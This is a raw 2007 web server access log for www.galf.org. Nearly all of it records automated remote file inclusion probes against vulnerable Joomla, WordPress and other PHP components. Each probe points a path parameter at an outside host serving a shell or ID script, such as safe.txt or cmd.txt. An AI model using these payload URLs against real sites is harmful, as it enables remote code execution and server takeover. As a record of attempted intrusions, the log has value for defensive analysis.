38.118.74.79 - - [05/Aug/2007:17:01:00 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://bhnofoco.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
38.118.74.79 - - [05/Aug/2007:17:01:00 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://bhnofoco.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
207.68.116.115 - - [05/Aug/2007:17:04:43 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bhnofoco.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
207.68.116.115 - - [05/Aug/2007:17:04:43 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bhnofoco.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
218.188.30.171 - - [05/Aug/2007:17:04:44 -0700] "GET /logs/access_070730.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.188.30.171 - - [05/Aug/2007:17:04:44 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.188.30.171 - - [05/Aug/2007:17:04:45 -0700] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.215.3.45 - - [05/Aug/2007:17:05:08 -0700] "GET /logs/access_061225.log HTTP/1.1" 404 275 "http://www.galf.org/logs/access_061225.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.galf.org"
62.215.3.45 - - [05/Aug/2007:17:05:50 -0700] "GET /logs/access_061225.log HTTP/1.1" 404 275 "http://www.galf.org/logs/access_061225.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.galf.org"
62.215.3.45 - - [05/Aug/2007:17:05:51 -0700] "GET /logs/access_061225.log HTTP/1.1" 404 275 "http://www.galf.org/logs/access_061225.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.galf.org"
89.178.41.115 - - [05/Aug/2007:17:07:14 -0700] "GET / HTTP/1.0" 200 1032 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.galf.org"
81.2.112.202 - - [05/Aug/2007:17:07:44 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
81.2.112.202 - - [05/Aug/2007:17:07:45 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
38.118.74.79 - - [05/Aug/2007:17:07:55 -0700] "GET /logs/access_070723.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://bhnofoco.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
38.118.74.79 - - [05/Aug/2007:17:08:20 -0700] "GET /logs/access_070730.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://bhnofoco.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
64.79.198.21 - - [05/Aug/2007:17:10:25 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
64.79.198.21 - - [05/Aug/2007:17:10:25 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
72.29.76.3 - - [05/Aug/2007:17:13:51 -0700] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
72.29.76.3 - - [05/Aug/2007:17:13:51 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
69.61.30.133 - - [05/Aug/2007:17:14:33 -0700] "GET /logs/index.php?open=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
69.61.30.133 - - [05/Aug/2007:17:14:33 -0700] "GET /index.php?open=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
69.61.30.133 - - [05/Aug/2007:17:14:33 -0700] "GET /logs/index.php?include=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
69.61.30.133 - - [05/Aug/2007:17:14:33 -0700] "GET /index.php?include=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
207.58.155.176 - - [05/Aug/2007:17:14:34 -0700] "GET /logs/index.php?open=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
207.58.155.176 - - [05/Aug/2007:17:14:34 -0700] "GET /index.php?open=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
88.49.97.181 - - [05/Aug/2007:17:15:28 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
88.49.97.181 - - [05/Aug/2007:17:15:29 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.22.71.168 - - [05/Aug/2007:17:16:28 -0700] "GET /logs/index.php?include=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.22.71.168 - - [05/Aug/2007:17:16:28 -0700] "GET /index.php?include=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.232.106.155 - - [05/Aug/2007:17:17:34 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.106.155 - - [05/Aug/2007:17:17:35 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.64.34.133 - - [05/Aug/2007:17:18:30 -0700] "GET /index.php?pag=http://zeronymus.php0h.com/cmds/R6??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.169.178.78 - - [05/Aug/2007:17:19:26 -0700] "GET /logs/access_070730.log/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.178.78 - - [05/Aug/2007:17:19:26 -0700] "GET /styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69"
81.169.178.78 - - [05/Aug/2007:17:19:27 -0700] "GET /logs/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.178.78 - - [05/Aug/2007:17:19:27 -0700] "GET /logs/access_070723.log/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.178.78 - - [05/Aug/2007:17:20:25 -0700] "GET /logs/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.178.78 - - [05/Aug/2007:17:20:25 -0700] "GET /styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
38.118.74.79 - - [05/Aug/2007:17:21:05 -0700] "GET /logs/announcements.php?phpraid_dir=http://bhnofoco.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
38.118.74.79 - - [05/Aug/2007:17:21:05 -0700] "GET /announcements.php?phpraid_dir=http://bhnofoco.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807"
69.64.34.133 - - [05/Aug/2007:17:21:20 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://zeronymus.php0h.com/cmds/R6??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
216.27.9.82 - - [05/Aug/2007:17:22:02 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
216.27.9.82 - - [05/Aug/2007:17:22:02 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
66.11.230.61 - - [05/Aug/2007:17:22:03 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.otriton.xpg.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.7.201.127 - - [05/Aug/2007:17:22:17 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://zeronymus.php0h.com/cmds/R6??? HTTP/1.1" 404 275 "-" "libwww-perl/5.807"
72.232.106.155 - - [05/Aug/2007:17:23:16 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.106.155 - - [05/Aug/2007:17:23:16 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.27.9.82 - - [05/Aug/2007:17:24:16 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
216.27.9.82 - - [05/Aug/2007:17:24:16 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
69.64.68.152 - - [05/Aug/2007:17:25:26 -0700] "GET /logs/index.php?p=http://ilegais.6te.net/Owner/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
69.64.68.152 - - [05/Aug/2007:17:25:26 -0700] "GET /index.php?p=http://ilegais.6te.net/Owner/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
74.6.27.19 - - [05/Aug/2007:17:27:51 -0700] "GET /labia/?M=D HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
69.64.68.152 - - [05/Aug/2007:17:29:34 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ilegais.6te.net/Owner/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
69.64.68.152 - - [05/Aug/2007:17:29:34 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ilegais.6te.net/Owner/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
75.80.22.213 - - [05/Aug/2007:17:30:03 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
75.80.22.213 - - [05/Aug/2007:17:30:03 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.27.9.82 - - [05/Aug/2007:17:32:17 -0700] "GET /logs/index.php?pag=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
216.27.9.82 - - [05/Aug/2007:17:32:18 -0700] "GET /index.php?pag=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
72.232.106.155 - - [05/Aug/2007:17:33:10 -0700] "GET /logs/access_070723.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.106.155 - - [05/Aug/2007:17:33:15 -0700] "GET /logs/access_070730.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.75.55.25 - - [05/Aug/2007:17:33:32 -0700] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.75.55.25 - - [05/Aug/2007:17:33:32 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.75.55.25 - - [05/Aug/2007:17:33:34 -0700] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.75.55.25 - - [05/Aug/2007:17:33:34 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.22.63.241 - - [05/Aug/2007:17:33:36 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.22.63.241 - - [05/Aug/2007:17:33:36 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.236.43.113 - - [05/Aug/2007:17:35:22 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.236.43.113 - - [05/Aug/2007:17:35:22 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
64.79.200.25 - - [05/Aug/2007:17:36:14 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.79.200.25 - - [05/Aug/2007:17:36:14 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.47.70.61 - - [05/Aug/2007:17:37:20 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.47.70.61 - - [05/Aug/2007:17:37:20 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.75.55.25 - - [05/Aug/2007:17:38:59 -0700] "GET /logs/access_070730.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.75.55.25 - - [05/Aug/2007:17:39:00 -0700] "GET /logs/access_070723.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.75.55.25 - - [05/Aug/2007:17:39:05 -0700] "GET /logs/access_070730.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.75.55.25 - - [05/Aug/2007:17:39:05 -0700] "GET /logs/access_070723.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.45.205.67 - - [05/Aug/2007:17:39:13 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.45.205.67 - - [05/Aug/2007:17:39:13 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.203.186.194 - - [05/Aug/2007:17:40:32 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.203.186.194 - - [05/Aug/2007:17:40:33 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.106.155 - - [05/Aug/2007:17:42:06 -0700] "GET /logs/index.php?file=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.106.155 - - [05/Aug/2007:17:42:06 -0700] "GET /index.php?file=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.54.146.38 - - [05/Aug/2007:17:43:11 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.54.146.38 - - [05/Aug/2007:17:43:16 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.10.195.217 - - [05/Aug/2007:17:43:50 -0700] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://ilegais.6te.net/res.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.10.195.217 - - [05/Aug/2007:17:43:50 -0700] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://ilegais.6te.net/res.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.10.195.217 - - [05/Aug/2007:17:43:51 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://ilegais.6te.net/res.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.10.195.217 - - [05/Aug/2007:17:43:51 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://ilegais.6te.net/res.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
218.188.30.171 - - [05/Aug/2007:17:45:01 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.188.30.171 - - [05/Aug/2007:17:45:02 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.169.178.78 - - [05/Aug/2007:17:46:17 -0700] "GET /logs/access_070730.log/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.178.78 - - [05/Aug/2007:17:46:18 -0700] "GET /logs/access_070723.log/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69"
74.53.207.2 - - [05/Aug/2007:17:47:22 -0700] "GET /logs/index2.php?pag=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807"
74.53.207.2 - - [05/Aug/2007:17:47:22 -0700] "GET /index2.php?pag=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
196.2.64.46 - - [05/Aug/2007:17:47:29 -0700] "GET /logs//index.php?action=http://www.myoung.co.kr/board/upload/z.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
196.2.64.46 - - [05/Aug/2007:17:47:30 -0700] "GET //index.php?action=http://www.myoung.co.kr/board/upload/z.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.58.161.181 - - [05/Aug/2007:17:49:18 -0700] "GET /logs/index2.php?x=http://www.ricksk8.xpg.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
207.58.161.181 - - [05/Aug/2007:17:49:18 -0700] "GET /index2.php?x=http://www.ricksk8.xpg.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
195.10.195.217 - - [05/Aug/2007:17:49:32 -0700] "GET /logs/access_070730.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://ilegais.6te.net/res.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.10.195.217 - - [05/Aug/2007:17:49:33 -0700] "GET /logs/access_070723.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://ilegais.6te.net/res.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.232.106.155 - - [05/Aug/2007:17:52:49 -0700] "GET /logs/access_070723.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
72.232.106.155 - - [05/Aug/2007:17:52:50 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
72.232.106.155 - - [05/Aug/2007:17:52:50 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
72.232.106.155 - - [05/Aug/2007:17:53:11 -0700] "GET /logs/access_070730.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
72.232.246.34 - - [05/Aug/2007:17:54:11 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
72.232.246.34 - - [05/Aug/2007:17:54:11 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
72.232.246.34 - - [05/Aug/2007:18:01:40 -0700] "GET /logs/access_070723.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
72.232.246.34 - - [05/Aug/2007:18:01:42 -0700] "GET /logs/access_070730.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807"
201.240.22.243 - - [05/Aug/2007:18:03:58 -0700] "GET / HTTP/1.1" 200 1048 "http://www.google.com.pe/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; (R1 1.3))" "www.galf.org"
208.101.17.36 - - [05/Aug/2007:18:04:53 -0700] "GET /logs/announcements.php?phpraid_dir=http://azahan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
208.101.17.36 - - [05/Aug/2007:18:04:53 -0700] "GET /announcements.php?phpraid_dir=http://azahan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
64.79.200.25 - - [05/Aug/2007:18:06:29 -0700] "GET /logs/index.php?open=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.79.200.25 - - [05/Aug/2007:18:06:29 -0700] "GET /index.php?open=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.198.2 - - [05/Aug/2007:18:11:59 -0700] "GET /logs/index2.php?url_page=http://mildnet.by.ru/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
72.232.198.2 - - [05/Aug/2007:18:11:59 -0700] "GET /index2.php?url_page=http://mildnet.by.ru/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
213.22.71.168 - - [05/Aug/2007:18:13:42 -0700] "GET /logs/index2.php?url_page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
213.22.71.168 - - [05/Aug/2007:18:13:42 -0700] "GET /index2.php?url_page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.191.51.220 - - [05/Aug/2007:18:13:53 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
88.191.51.220 - - [05/Aug/2007:18:13:54 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.238.195.12 - - [05/Aug/2007:18:16:56 -0700] "GET /logs/index.php?go=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.238.195.12 - - [05/Aug/2007:18:16:56 -0700] "GET /index.php?go=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
69.246.102.2 - - [05/Aug/2007:18:20:58 -0700] "GET /logs/scripts.log HTTP/1.1" 200 2478 "http://www.google.com/search?hl=en&q=hu++++++++++++++++++++++++++++++++++++++++++++++++++++++++++com_extcalendar" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) w:PACBHO60" "www.galf.org"
207.68.116.115 - - [05/Aug/2007:18:21:23 -0700] "GET /logs/announcements.php?phpraid_dir=http://bhnofoco.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
207.68.116.115 - - [05/Aug/2007:18:21:24 -0700] "GET /announcements.php?phpraid_dir=http://bhnofoco.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
